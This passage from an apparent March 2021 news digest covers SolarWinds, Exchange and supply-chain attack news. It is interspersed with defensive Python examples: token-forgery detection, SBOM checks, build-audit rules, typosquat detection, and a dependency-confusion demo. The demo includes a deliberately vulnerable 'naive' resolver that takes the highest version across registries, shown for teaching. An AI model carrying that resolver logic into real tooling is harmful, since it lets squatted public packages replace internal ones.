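# cloud sign-in log is a hypothetical assumption for this illustration.
from dataclasses import dataclass
from datetime import datetime, timedelta

# Constructed issuance log: time, user, assertion ID (one line per token signed).
ADFS_ISSUANCE_LOG = """\
2021-03-17T08:01:12Z alice@corp.example _a1b2c3
2021-03-17T08:05:40Z bob@corp.example _d4e5f6
"""

# Constructed cloud sign-in log: time presented, user, assertion ID,
# NotBefore, NotOnOrAfter (the assertion's validity window).
CLOUD_SIGNIN_LOG = """\
2021-03-17T08:01:15Z alice@corp.example _a1b2c3 2021-03-17T08:01:12Z 2021-03-17T09:01:12Z
2021-03-17T08:05:43Z bob@corp.example _d4e5f6 2021-03-17T08:05:40Z 2021-03-17T09:05:40Z
2021-03-17T23:40:02Z admin@corp.example _9f9f9f 2021-03-17T23:39:00Z 2021-03-24T23:39:00Z
"""


@dataclass
class Finding:
    assertion_id: str
    user: str
    reason: str


def parse_ts(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")


def load_issuances(text: str) -> dict:
    """Map assertion ID -> (issue time, user) for every token the IdP signed."""
    issued = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, user, assertion_id = line.split()
        issued[assertion_id] = (parse_ts(ts), user)
    return issued


def find_suspicious_tokens(issuance_text: str, signin_text: str,
                           max_lifetime: timedelta = timedelta(hours=1)) -> list:
    """Flag presented tokens with no issuance record, a user mismatch,
    or a validity window longer than the IdP is configured to issue."""
    issued = load_issuances(issuance_text)
    findings = []
    for line in signin_text.splitlines():
        if not line.strip():
            continue
        _seen, user, assertion_id, nbf, exp = line.split()
        record = issued.get(assertion_id)
        if record is None:
            findings.append(Finding(assertion_id, user,
                                    "no matching issuance record on the federation server"))
        elif record[1] != user:
            findings.append(Finding(assertion_id, user,
                                    "issuance record names a different user"))
        lifetime = parse_ts(exp) - parse_ts(nbf)
        if lifetime > max_lifetime:
            findings.append(Finding(assertion_id, user,
                                    f"validity window {lifetime} exceeds policy maximum {max_lifetime}"))
    return findings


if __name__ == "__main__":
    for f in find_suspicious_tokens(ADFS_ISSUANCE_LOG, CLOUD_SIGNIN_LOG):
        print(f"{f.assertion_id} {f.user}: {f.reason}")
```

In the constructed data, the two tokens the federation server really issued pass, while the admin token is flagged twice: it was never issued on-premises and it is valid for a week. The lifetime check matters on its own, because an attacker who holds the signing key can mint tokens with any NotOnOrAfter they like.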

_______________________________________________________________________________________

(March 17, 2021)


How the Linux Foundation’s software signing combats supply chain attacks

The Linux Foundation is launching sigstore, a free service jointly developed with Google, Red Hat, and Purdue University, that software developers can use to digitally sign their software releases. sigstore is meant to help protect open source consumers against attacks such as dependency confusion, in which a package manager is duped into installing a malicious package from a public registry in place of an internal package of the same name, typically because the public copy carries a higher version number.


_______________________________________________________________________________________

(March 16, 2021)


Biden's supply chain EO may uncover these cyber risks

While the government continues to assess the scope and scale of that breach, the White House is now directing various executive departments to assess the risks in their respective supply chains. The executive order calls for both 100-day immediate reviews of certain products, as well as year-long sectoral supply chain reviews of the defense, health, transportation, and agriculture industries, among others.

Ref - FCW 

_______________________________________________________________________________________

(March 16, 2021)


Mimecast decommissioned SolarWinds Orion after hack

The Lexington, Mass.-based email security vendor - Mimecast - became one of the first SolarWinds hack victims to publicly announce they’re dumping the industry-leading Orion network monitoring platform for a competing product. Industry experts had considered it unlikely that the hack would lead to many customers getting rid of SolarWinds due to the unique visibility and monitoring features Orion offers.

Ref - CRN

_______________________________________________________________________________________

(March 16, 2021)


SolarWinds hack underscores the network's role in security

According to Juniper Networks VP of Security Business and Strategy Samantha Madrid, the SolarWinds hack has put a fine point on the importance of network security. While the full scope of the supply chain attack remains under investigation, it brought network visibility and the need for security enforcement at every point of connection into sharper focus.


_______________________________________________________________________________________

(March 16, 2021)


Using CodeQL to spot traces of Solorigate

If a build server is backdoored with the build hijacking component of the Solorigate malware campaign, the malware will inject additional source code at compilation time. If CodeQL is observing the build process on the infected server, it will extract the injected malicious source code together with the genuine source code. The resulting CodeQL database will therefore contain traces of the malicious Solorigate source code.

Ref - GitHub

_______________________________________________________________________________________

(March 16, 2021)


Mimecast confirms that SolarWinds hackers used Sunburst malware for initial intrusion

Mimecast has confirmed that the state-sponsored SolarWinds hackers who breached its network earlier this year used the Sunburst backdoor during the initial intrusion. Using this entry point, the threat actor accessed certain Mimecast-issued certificates and related customer server connection information.


_______________________________________________________________________________________

(March 16, 2021)


How to prevent supply chain attacks?

UpGuard lists 11 cybersecurity strategies that could help prevent supply chain attacks, including: deploy honeytokens, secure privileged access management, implement a zero-trust architecture, assume a breach will happen, identify potential insider threats and protect vulnerable resources, minimize access to sensitive data, enforce strict shadow IT rules, run regular third-party risk assessments, monitor vendor networks for vulnerabilities, and identify vendor data leaks.

Ref - UpGuard

_______________________________________________________________________________________

(March 16, 2021)


Software supply chain attacks are not easy to tackle

As companies scramble to investigate whether their own systems and data were potentially impacted by the SolarWinds compromise, executives, boards, and customers are discovering that the threat of supply chain attacks expands beyond this one single incident and that mitigating the risks associated with them is not straightforward.


_______________________________________________________________________________________

(March 15, 2021)


Security ratings could raise the bar on cyber hygiene

Plans from the Biden administration to release a product security rating system could raise the bar for security overall but won’t likely prevent the next SolarWinds or Microsoft hacks. Experts say the simplicity of that concept is both its strength and its weakness: it’s a concept that is easy to understand and could drive compliance with a set of standards, but it won’t prevent more sophisticated attacks.


_______________________________________________________________________________________

(March 15, 2021)


Better security approach against supply chain attacks 

Effective procurement language should be developed that holds a supplier or other third party contractually liable for the statements they make about the quality, reliability, and security of the software they provide. Organizations need to consider the software and service provider's processes when discussing a partnership and define which security measures will be implemented.

Ref - Medium

_______________________________________________________________________________________

(March 15, 2021)


TIA reveals new global supply chain security standard - SCS 9001

The Telecommunications Industry Association (TIA) has published a new white paper on SCS 9001, the first process-based supply chain security standard for the information communications technology (ICT) industry. Scheduled to release later this year, the new standard will be measurable and verifiable as a means for service providers, manufacturers, and vendors to ensure that their supply chains meet the critical requirements needed to mitigate the risk of cybersecurity breaches and attacks.

Ref - Yahoo 

_______________________________________________________________________________________

(March 15, 2021)


SolarWinds attacks recovery could take the U.S. government 18 months

Brandon Wales, acting director of CISA, said that the U.S. government’s recovery effort from the SolarWinds supply chain attack could take well into 2022. This prediction reflects the complex nature of the breach and the length of time during which the attackers hid in their victims’ networks.


_______________________________________________________________________________________

(March 14, 2021)


White House seeks new cybersecurity approach after failing to detect hacks

The sophisticated hacks pulled off by Russia and China against a broad array of government and industrial targets in the United States, and the failure of the intelligence agencies to detect them, are driving the Biden administration and Congress to rethink how the nation should protect itself from growing cyber threats. Both campaigns were run from servers inside the United States, placing them out of reach of the NSA's early-warning system, which does not monitor domestic networks.


_______________________________________________________________________________________

(March 14, 2021)

Software Bill Of Materials: an efficient mitigation strategy for supply chain attacks

There is an efficient mitigation strategy for supply chain attacks: the bill of materials, or BOM. In its simplest form, a BOM is a long list of ingredients: every material and quantity needed to manufacture the end product. Applied to software, a precise BOM gives deep insight into the product and all of its parts, and therefore into the supply chain vulnerabilities attached to each part.

Ref - Medium
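The patch-management entry above (an SBOM for deployed software and for incoming updates) and this BOM entry both come down to the same mechanical check: walk the component list and match each name and version against a vulnerability feed, treating a component with no version as a finding in its own right because it cannot be assessed at all. The script below is an added example written for this page, not code from either article. The SBOM content, component names and the "ADV-EXAMPLE-*" advisories are constructed; only the top-level field names follow the real CycloneDX JSON format.

```python
# Added example (not from the page): check a CycloneDX-style SBOM against a
# vulnerability feed. SBOM content, component names and advisory IDs are
# constructed; the top-level field names follow the CycloneDX JSON format.
import json

SBOM_JSON = """{
  "bomFormat": "CycloneDX",
  "specVersion": "1.3",
  "components": [
    {"type": "library", "name": "netmon-agent", "version": "2.3.0",
     "purl": "pkg:nuget/netmon-agent@2.3.0"},
    {"type": "library", "name": "auth-helper", "version": "1.9.4",
     "purl": "pkg:nuget/auth-helper@1.9.4"},
    {"type": "library", "name": "legacy-compat"}
  ]
}"""

# Constructed advisories as half-open version ranges [introduced, fixed).
ADVISORIES = [
    {"id": "ADV-EXAMPLE-0001", "component": "netmon-agent", "introduced": "2.0.0", "fixed": "2.4.1"},
    {"id": "ADV-EXAMPLE-0002", "component": "auth-helper", "introduced": "1.0.0", "fixed": "1.9.0"},
]


def version_key(v):
    """'2.4.1' -> (2, 4, 1). Non-numeric segments (pre-release tags) are a
    simplification here and compare as 0."""
    return tuple(int(s) if s.isdigit() else 0 for s in v.split("."))


def in_range(version, introduced, fixed):
    """True when introduced <= version < fixed, padding so that 2.4 == 2.4.0."""
    keys = [version_key(x) for x in (version, introduced, fixed)]
    n = max(len(k) for k in keys)
    vk, ik, fk = (k + (0,) * (n - len(k)) for k in keys)
    return ik <= vk < fk


def assess_sbom(sbom_json, advisories=ADVISORIES):
    """Return (component, version, advisory-or-UNPINNED) for every hit."""
    bom = json.loads(sbom_json)
    if bom.get("bomFormat") != "CycloneDX":
        raise ValueError("expected a CycloneDX document")
    findings = []
    for comp in bom.get("components", []):
        name, version = comp.get("name"), comp.get("version")
        if not version:
            # An unpinned component cannot be assessed; surface it rather than skip it.
            findings.append((name, None, "UNPINNED"))
            continue
        for adv in advisories:
            if adv["component"] == name and in_range(version, adv["introduced"], adv["fixed"]):
                findings.append((name, version, adv["id"]))
    return findings


if __name__ == "__main__":
    for name, version, hit in assess_sbom(SBOM_JSON):
        print(f"{name} {version or '(no version)'}: {hit}")
```

Run against an SBOM for the currently deployed build and again against the SBOM of a pending update, and the diff of the two result lists tells you what the update fixes and what it introduces.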

_______________________________________________________________________________________

(March 13, 2021)


Security best practices after SolarWinds supply chain attack

Implementing supply chain security best practices can help mitigate third-party risk and meet the needs of the changing enterprise ecosystem. Organizations are advised to conduct asset and access inventories, elevate third-party risk management, and ensure that third-party relationships are collaborative.


_______________________________________________________________________________________

(March 12, 2021)


A senior administration official on the response to the Microsoft and SolarWinds intrusions

According to a senior administration official, they are in week three of four-week remediation across the federal government. The compromised agencies were all tasked to do a particular set of activities and then were tasked to have an independent review of their work to ensure the adversary had been eradicated. Most of the agencies have completed that independent review and the rest will complete it by the end of March.


_______________________________________________________________________________________

(March 12, 2021)


SolarWinds and Microsoft hacks spark debate over western retaliation

Cyber experts have cautioned that retaliation for the SolarWinds and Microsoft hacks may not be justified. Neither is an instance of conflict in any conventional sense; they are espionage, and therefore part of the continual interaction between these states.


_______________________________________________________________________________________

(March 12, 2021)


The first-ever U.S. national cyber director after SolarWinds breach

The new national cyber director will be responsible for crafting a national cyber strategy as well as driving more consistency across civilian government networks. If disaster strikes, the director will serve as the point person in coordinating the government’s nonmilitary response. 

Ref - Fortune

_______________________________________________________________________________________

(March 11, 2021)


Risks of supply chain attacks for organizations

Supply chain security risks are not new, but the recent headlines are a reminder for software consumers to re-examine their security practices. The trojanized SolarWinds Orion update reached as many as 18,000 customers, and the incident may serve as the focal point for dealing with digital supply chain risks.

Ref - Synopsys

_______________________________________________________________________________________

(March 11, 2021)


Managing supply chain security risk 

After the SolarWinds attack, information security and risk management teams need to think beyond third-party and vendor risk management. Supply chain risk management should build on the standardized practices that already exist across many risk disciplines, and it requires cooperation and collaborative relationships across all areas of the organization.


_______________________________________________________________________________________

(March 11, 2021)


Embedded devices are a blind spot in the SolarWinds attack

Attention so far has focused on how the SolarWinds attackers moved through compromised networks, whether via Office 365 or VMware, and on a separate campaign that exploited a bug in SolarWinds Orion. However, the industry is overlooking a more nefarious but equally plausible objective: attackers may have used SolarWinds as a pathway into key networks where they could burrow deep into the embedded devices of industrial control systems.

Ref - The Hill

_______________________________________________________________________________________

(March 11, 2021)


Nation-state hackers exploited the U.S. Internet security gap

U.S. lawmakers and security experts are voicing concern that foreign governments are staging cyberattacks using servers in the U.S., in an apparent effort to avoid detection by America’s principal cyberintelligence organization. When hackers recently targeted servers running Microsoft Corp.’s Exchange software, they employed U.S.-based computers from at least four service providers to mount their attack, according to an analysis by the threat intelligence company DomainTools LLC.


_______________________________________________________________________________________

(March 10, 2021)


Risks of integrating technology vulnerabilities into the foundational technology

The SolarWinds attacks and other events in 2020 spotlight a new burden for C-suites and boards to manage: the malicious supply chain influence of nation-state intelligence services. In recent supply chain attacks, the adversaries are not just finding and exploiting technology vulnerabilities but creating them and integrating them into the foundational technology.

Ref - Forbes

_______________________________________________________________________________________

(March 10, 2021)


Hacker group claims access to internal video feeds by compromising supplier

Hackers said they accessed internal video feeds at several companies, including Tesla Inc., and at public agencies by breaching the network of security-camera vendor Verkada Inc., the latest cybersecurity incident in which a supplier unwittingly opened a back door into client networks. The group found a username and password for a Verkada administrative account on the internet, permitting them to obtain the footage.


_______________________________________________________________________________________

(March 10, 2021)


How to beat the new breed of Supply Chain attacks

The plethora of new malware strains (e.g., SUNBURST, SUPERNOVA, GoldMax, Sibot, and GoldFinder) that have emerged in the wake of the SolarWinds breach should force all enterprises to take the supply chain attack vector seriously. Comparing traditional supply chain attacks with the recent SolarWinds and Microsoft hacks, it is clear that attackers have upped their game to a whole new level, both in sophistication and tactics.

Ref - SentinelOne 

_______________________________________________________________________________________

(March 10, 2021)


Monitoring the software supply chain in Microsoft environment

Microsoft has described ways to monitor the software development, build, and release process via Azure Sentinel, specifically to detect any NOBELIUM-related activity. The blog uses Microsoft’s security monitoring solution Azure Sentinel, and Microsoft’s cloud CI/CD solution Azure DevOps as the focus point, however, the monitoring principles and approaches could also be applied to other technology stacks.

Ref - Microsoft 
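The monitoring principle in the Microsoft write-up above is rule-based detection over the build system's audit trail: a pipeline definition changed outside review, a release cut shortly after such a change, or a build agent or secret store touched by an account that is not a build administrator. The script below is an added example written for this page, not Microsoft's code or its Azure Sentinel queries. The JSON-lines event format, the field and action names, and the allowlist are all constructed for the illustration and do not correspond to the real Azure DevOps audit schema.

```python
# Added example (not Microsoft's code or its Sentinel queries): rule-based
# detection over build-system audit events. The event format, field names,
# action names and allowlist below are constructed for this illustration
# and do not match the real Azure DevOps audit schema.
import json
from datetime import datetime, timedelta

BUILD_ADMINS = {"ci-admin@corp.example"}  # constructed allowlist

# Constructed audit stream: an unreviewed pipeline change followed by an
# artifact publish from the same pipeline, a reviewed change elsewhere, and
# a build agent registered by an account outside the allowlist.
AUDIT_EVENTS = """\
{"time": "2021-03-10T02:11:05Z", "actor": "build-svc@corp.example", "action": "pipeline.definition.modified", "target": "orion-build", "reviewed": false}
{"time": "2021-03-10T02:40:19Z", "actor": "build-svc@corp.example", "action": "artifact.published", "target": "orion-build"}
{"time": "2021-03-10T09:15:00Z", "actor": "dev1@corp.example", "action": "pipeline.definition.modified", "target": "web-ui", "reviewed": true}
{"time": "2021-03-10T11:00:00Z", "actor": "contractor@corp.example", "action": "agentpool.agent.registered", "target": "pool-default"}
"""

# Actions that touch the build infrastructure itself or its secrets (constructed names).
SENSITIVE_ACTIONS = {"agentpool.agent.registered", "serviceconnection.modified", "variablegroup.modified"}


def parse_events(text):
    events = [json.loads(line) for line in text.splitlines() if line.strip()]
    for e in events:
        e["time"] = datetime.strptime(e["time"], "%Y-%m-%dT%H:%M:%SZ")
    return sorted(events, key=lambda e: e["time"])


def detect(text, admins=BUILD_ADMINS, window=timedelta(hours=24)):
    """Return (severity, rule, event) for every rule that fires, in time order."""
    findings = []
    unreviewed = {}  # pipeline -> time of its last unreviewed definition change
    for e in parse_events(text):
        if e["action"] == "pipeline.definition.modified" and not e.get("reviewed", False):
            findings.append(("high", "unreviewed-pipeline-change", e))
            unreviewed[e["target"]] = e["time"]
        elif e["action"] == "artifact.published":
            # The hijacked-build pattern: definition tampered with, then a release cut.
            changed = unreviewed.get(e["target"])
            if changed is not None and e["time"] - changed <= window:
                findings.append(("high", "release-after-unreviewed-change", e))
        if e["action"] in SENSITIVE_ACTIONS and e["actor"] not in admins:
            findings.append(("high", "sensitive-change-by-non-admin", e))
    return findings


if __name__ == "__main__":
    for severity, rule, e in detect(AUDIT_EVENTS):
        print(f"[{severity}] {rule}: {e['actor']} {e['action']} {e['target']} at {e['time']:%H:%M}")
```

The second rule is the one worth keeping whatever stack you run: a release that follows an unreviewed change to its own pipeline within a short window is the shape of a build hijack, and it only needs two event types to be logged.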

_______________________________________________________________________________________

(March 10, 2021)


SolarWinds is not an isolated event going forward - VMware Report

The 2021 Global Cybersecurity Outlook report from VMware's Security Business Unit suggests that "island-hopping" attacks, in which attackers jump from one network to another along a supply chain as happened in the SolarWinds attack, are on the rise. Organizations have to realize that the question is no longer just whether breaches along their supply chain can be leveraged to attack them, but whether they themselves can be used to attack their customers.


_______________________________________________________________________________________

(March 9, 2021)


The inside story of the stealthy SolarWinds SUNBURST attack

The SolarWinds attack was carried out without weaponizing any known zero-day vulnerability. The attackers made their malicious version of the SolarWinds Orion DLL look like a normal build of the software, so it was virtually impossible to detect by inspection: everything looked official. But as the intruders move through a network by accessing new accounts, the departure from the normal behavior of the targeted users and devices opens a window of opportunity for detection.

Ref - Varonis 


_______________________________________________________________________________________

(March 9, 2021)


The separate SolarWinds attack described by researchers

Russian hackers apparently weren't the only ones targeting SolarWinds customers. Researchers from Secureworks discovered the 'Spiral' activity at one organization in November 2020, when, during an incident response engagement, they spotted hackers exploiting a SolarWinds Orion API vulnerability on an internet-facing SolarWinds server. Spiral's activities are separate from the SolarWinds supply chain compromise first reported in December 2020.


_______________________________________________________________________________________

(March 9, 2021)


Microsoft released a patch for older versions of Exchange

Microsoft has released security updates for unsupported versions of Exchange email servers following widespread attacks exploiting four newly discovered security vulnerabilities. The updates for older Exchange versions address only the four newly disclosed flaws, tracked as CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065. The issues affect on-premises Exchange servers.

Ref - ZDNet

_______________________________________________________________________________________

(March 9, 2021)


Implications of recent supply chain attacks

The implications of SolarWinds have made all CSOs rethink their approach to cybersecurity. For decades, manufacturing equipment would operate in isolation from public networks to keep adversarial agents from gaining access and potentially disrupting operations. However, as supply chains became more intertwined with operations, third parties were granted access to those systems in order to automate the ordering and fulfillment of maintenance and materials.

Ref - Forbes

_______________________________________________________________________________________

(March 9, 2021)


Analysis of the biggest Python supply chain attack ever

On March 1st, 2021, a newly created account on the Python Package Index (PyPI) uploaded 3591 new packages. Each package had a name that closely resembled the name of a popular package. Each carried only an install-time script that signaled back that it had been downloaded and installed, and did nothing beyond that. This could be the work of a security researcher who wanted to raise awareness of typosquatting supply chain attacks by publishing a large number of fake packages and collecting statistics on how many times each one was downloaded.

Ref - Sogeti

_______________________________________________________________________________________

(March 9, 2021)


More clues appear to link Supernova web shell activity to China

According to Secureworks' new report, the authentication bypass vulnerability in SolarWinds Orion API, tracked as CVE-2020-10148, that can lead to remote execution of API commands, has been actively exploited by Spiral. When vulnerable servers are detected and exploited, a script capable of writing the Supernova web shell to disk is deployed using a PowerShell command.

Ref - TechRadar 

_______________________________________________________________________________________

(March 8, 2021)


‘Retaliation’ for Russia's SolarWinds spying might not be a good idea for the US

Before the US mounts a saber-rattling counterattack, it should pin down exactly what line Russia crossed. Any rule that could justify retaliation for SolarWinds is one that the US itself violates with its own cyberespionage. And there's still no evidence that Russia's hacking in this case went beyond the stealthy intelligence gathering that the US performs routinely around the world.

Ref - Wired 

_______________________________________________________________________________________

(March 8, 2021)


Hackers who hid Supernova malware in SolarWinds Orion linked to China

Intrusion activity related to the Supernova malware, which was planted on compromised SolarWinds Orion installations exposed to the public internet, points to an espionage threat actor based in China. Security researchers named this group 'Spiral' and correlated findings from two intrusions in 2020 on the same victim network to attribute both to the same intruder.


_______________________________________________________________________________________

(March 8, 2021)


SolarWinds Breach: Supernova malware linked to a China-based threat group

Secureworks' counter-threat unit (CTU) said that during late 2020, a compromised Internet-facing SolarWinds server was used as a springboard to deploy Supernova, a .NET web shell. Similar intrusions on the same network suggest that the Spiral threat group, suspected of a Chinese origin, is to blame for both cases. According to the researchers, CVE-2020-10148 has been actively exploited by Spiral.

Ref - ZDNet

_______________________________________________________________________________________

(March 8, 2021)


A supply chain attack is targeting the Python community with 4000 fake modules

A user has uploaded 3951 utterly bogus PyPI packages, with names that are near-misses of several genuine Python packages. None of these fake packages contained outright malware, or indeed any permanent package code at all. However, some of them (if not all) included a Python command intended to run when the package was installed, rather than when it was used.

Ref - Sophos
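The Sogeti analysis above and this Sophos write-up describe the same phenomenon from the defender's side: a flood of new package names each one keystroke away from a popular name. A registry or a dependency-review job can catch the bulk of these mechanically by measuring edit distance with adjacent transpositions counted, since a swapped pair of letters is the most common typo. The script below is an added example written for this page, not code from either article; the popular-package list and the candidate uploads are constructed.

```python
# Added example (not from the Sogeti or Sophos write-ups): flag uploaded
# package names within one edit (insert, delete, substitute or adjacent
# swap) of a popular package. Popular list and candidates are constructed.

POPULAR = ["requests", "numpy", "urllib3", "python-dateutil", "setuptools"]

# Constructed uploads: the genuine name, four near-misses and one unrelated name.
CANDIDATES = ["requests", "reqeusts", "nmpy", "urllib4", "python-datetuil", "flask-admin-tools"]


def normalize(name):
    """PEP 503-style normalization so '-', '_' and '.' variants compare equal."""
    return name.lower().replace("_", "-").replace(".", "-")


def osa_distance(a, b):
    """Optimal string alignment distance: Levenshtein plus adjacent transpositions."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]


def classify(name, popular=POPULAR, max_distance=1):
    """Return (target, distance) if name is a near-miss of a popular package,
    else None. The genuine name itself is never a finding."""
    n = normalize(name)
    best = None
    for p in popular:
        pn = normalize(p)
        if n == pn:
            return None
        dist = osa_distance(n, pn)
        if dist <= max_distance and (best is None or dist < best[1]):
            best = (p, dist)
    return best


def scan(candidates=CANDIDATES, popular=POPULAR):
    """List (candidate, popular target, distance) for every suspicious name."""
    findings = []
    for c in candidates:
        hit = classify(c, popular)
        if hit:
            findings.append((c, hit[0], hit[1]))
    return findings


if __name__ == "__main__":
    for candidate, target, dist in scan():
        print(f"{candidate!r} is {dist} edit from {target!r}")
```

A distance threshold of one is deliberately tight; raising it catches more squats but starts flagging legitimate short names against each other, so in practice the threshold is scaled with name length.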

_______________________________________________________________________________________

(March 6, 2021)


This new type of supply-chain attack has serious consequences 

A new type of supply chain attack (dubbed Dependency Confusion) unveiled last month is targeting more and more companies, with new rounds this week taking aim at Microsoft, Amazon, Slack, Lyft, Zillow, and an unknown number of others. In weeks past, Apple, Microsoft, Tesla, and 32 other companies were targeted by a similar attack that allowed a security researcher to execute unauthorized code inside their networks.


_______________________________________________________________________________________

(March 5, 2021)


A supply chain attack has breached multiple airlines

A communications and IT vendor for 90 percent of the world’s airlines, SITA, has been breached, compromising passenger data stored on the company’s U.S. servers in what the company is calling a highly sophisticated attack. The affected servers are in Atlanta and belong to the SITA Passenger Service System (SITA PSS).


_______________________________________________________________________________________

(March 5, 2021)


Singapore Airlines among latest victims of supply chain attack

An aviation IT company that says it serves 90% of the world's airlines has been breached in what appears to be a coordinated supply chain attack. Customers of at least four carriers - Malaysia Airlines, Singapore Airlines, Finnair, and Air New Zealand - may have been affected by the incident.


_______________________________________________________________________________________

(March 5, 2021)


Microsoft is now adopting an aggressive strategy for sharing SolarWinds hack intel

Rob Lefferts, corporate vice president for Microsoft 365 Security in Security and Compliance, explains the company's approach to keeping its customers and the industry apprised and updated on its findings from the now-infamous SolarWinds attack. In the wake of a widespread cyberattack, enterprise IT providers can play a key role in how businesses learn about and mitigate the security threat.


_______________________________________________________________________________________

(March 5, 2021)


30,000 organizations' email hacked via Microsoft Exchange Server vulnerabilities

Four vulnerabilities in Microsoft's Exchange Server software have reportedly led to over 30,000 US governmental and commercial organizations having their email hacked, according to a report by KrebsOnSecurity. This campaign is separate from the SolarWinds compromise. The vulnerabilities allowed hackers to gain access to email accounts, and also gave them the ability to install malware that might let them back into those servers at a later time.

Ref - The Verge

_______________________________________________________________________________________

(March 4, 2021)


Researchers disclosed additional malware linked to SolarWinds attackers

Researchers with Microsoft and FireEye have uncovered three more custom malware families, named GoldMax, Sibot, and GoldFinder, which they say are used by the threat group behind the SolarWinds attack.


_______________________________________________________________________________________

(March 3, 2021)


Malicious code bombs are targeting Amazon, Lyft, Slack, Zillow via supply chain attacks

Attackers have weaponized code dependency confusion to target internal apps at tech giants. Researchers have spotted malicious packages targeting internal applications for Amazon, Lyft, Slack, and Zillow (among others) inside the npm public code repository — all of which exfiltrate sensitive information.


_______________________________________________________________________________________

(March 3, 2021)


SolarWinds breach showed increased sophistication of advanced threat actors

Microsoft has highlighted the increasingly sophisticated cyber-threat landscape, particularly as a result of the rise in nation-state attacks. During a session at the Microsoft Ignite event, the company outlined some of the trends it is seeing and actions it is taking to help mitigate them in the future.


_______________________________________________________________________________________

(March 2, 2021)


SolarWinds breach cost $3.5 million in expenses 

SolarWinds has reported expenses of $3.5 million from last year's supply-chain attack, including costs related to incident investigation and remediation. Further expenses were recorded by SolarWinds after paying for legal, consulting, and other professional services related to the December hack and provided to customers for free.


_______________________________________________________________________________________

(March 1, 2021)


Dependency Confusion is being used to create copycat packages

Sonatype has identified new “dependency confusion” packages published to the npm ecosystem that are malicious in nature. These squatted packages are named after repositories, namespaces, or components used by popular companies such as Amazon, Zillow, Lyft, and Slack.

Ref - Sonatype
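The sigstore entry, the two March 3 and March 6 entries and this Sonatype entry all turn on one resolver behaviour: when a package manager is allowed to consult both a private and a public registry for the same name and takes the highest version it sees, an attacker only has to publish the internal name publicly with a very large version number. The fix is to decide the registry from policy before looking the name up, and never fall back. The code below is an added example written for this page, not Sonatype's code or any package manager's resolver. Both registries are constructed in-memory tables and the "acme" names are hypothetical.

```python
# Added example (not Sonatype's or any package manager's code): a toy resolver
# showing why a private-to-public fallback is exploitable, next to a
# policy-pinned resolver that is not. Registries are constructed in-memory
# dicts; the "acme" names are hypothetical.

PRIVATE_REGISTRY = {
    "@acme/billing-core": ["1.4.0", "1.5.2"],
    "acme-internal-utils": ["0.9.1"],
}
PUBLIC_REGISTRY = {
    "lodash": ["4.17.20", "4.17.21"],
    "acme-internal-utils": ["99.0.0"],  # constructed squat of the internal name
}
REGISTRIES = {"private": PRIVATE_REGISTRY, "public": PUBLIC_REGISTRY}

# Policy: which registry owns which name prefixes. Anything else is public.
ROUTES = {"@acme/": "private", "acme-": "private"}


def version_key(v):
    return tuple(int(x) for x in v.split("."))


def resolve_naive(name):
    """Vulnerable: consult every registry and take the highest version seen,
    which is exactly the behaviour a dependency-confusion squat relies on."""
    candidates = [(version_key(v), source, v)
                  for source, reg in REGISTRIES.items()
                  for v in reg.get(name, [])]
    if not candidates:
        raise LookupError(name)
    _, source, v = max(candidates)
    return source, v


def resolve_pinned(name, routes=ROUTES):
    """Hardened: choose the registry from policy before looking up, and never
    fall back to another registry when the name is absent from its own."""
    source = next((reg for prefix, reg in routes.items() if name.startswith(prefix)), "public")
    versions = REGISTRIES[source].get(name)
    if not versions:
        raise LookupError(f"{name!r} is not published in its designated registry ({source}); refusing to fall back")
    return source, max(versions, key=version_key)


if __name__ == "__main__":
    for name in ("acme-internal-utils", "@acme/billing-core", "lodash"):
        print(name, "naive ->", resolve_naive(name), "pinned ->", resolve_pinned(name))
```

The refusal to fall back is the part teams most often skip: a private name that is not yet published should fail the build loudly, not silently succeed from the public registry. Registering the internal names on the public registry as placeholders is a complementary measure for ecosystems where scoping is not available.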

_______________________________________________________________________________________

(March 2, 2021)


The SolarWinds hack compromised NASA and FAA

In addition to infiltrating the unclassified networks of seven other US government agencies, the suspected Russian hackers who compromised the IT services firm SolarWinds as a jumping-off point also penetrated NASA and the Federal Aviation Administration. The seven other breached agencies are the Departments of Commerce, Homeland Security, Energy, and State, the US Treasury, the National Institutes of Health, and the Justice Department. The White House said earlier this month that hackers also compromised 100 companies in the spree.

Ref - Wired

_______________________________________________________________________________________

(February 25, 2021)

Microsoft now sharing CodeQL queries for scanning SolarWinds-like implants code

Microsoft has open-sourced the CodeQL queries that developers can use to scan source code for malicious implants matching those used in the SolarWinds supply-chain attack. To make sure the attackers had not modified its own code base, Microsoft wrote these queries and ran them across its repositories, looking for code patterns matching the SolarWinds indicators of compromise.


_______________________________________________________________________________________

(February 25, 2021)


Security experts were blindsided by the SolarWinds attack

The SolarWinds cyberattack on U.S. government agencies and private organizations was and is frightening in its scale and success. It proved no match for the government agencies charged with defending against such things and brought into sharp focus the fact that the government’s current model for responding to cyber threats is lacking. In a sense, the SolarWinds attack seemed designed to exploit a lack of communication and cooperation between government and private-sector security experts.

Ref - Medium

_______________________________________________________________________________________

(February 25, 2021)


SolarWinds hackers take advantage of Amazon Elastic Compute Cloud

Amazon Web Services admitted that hackers used its systems in the SolarWinds campaign but reiterated the cloud computing giant wasn’t itself infected with malware. The actors used EC2 [Amazon Elastic Compute Cloud] just like they would use any server they could buy or use anywhere (on-premises or in the cloud). And, in fact, the actors did use several different service providers in this manner.

Ref - CRN

_______________________________________________________________________________________

(February 24, 2021)


SolarWinds breach is one of the biggest attacks ever - US Senate committee

The United States Senate's select committee on intelligence met to hear evidence from tech executives regarding the historic hack on Texas-based company SolarWinds. The committee heard that both the scale and sophistication of the attack were greater than had been previously thought.


_______________________________________________________________________________________

(February 24, 2021)


More SolarWinds breach victims could still be undisclosed

Microsoft believes that the SolarWinds hackers may have used up to a dozen different means of getting into victims’ networks over the past year, a higher estimate than previously understood. It is likely that more brand-name players have been penetrated in the SolarWinds breach. They have not been as forthcoming as other victims, leaving policymakers and potential customers in the dark.

Ref - WSJ

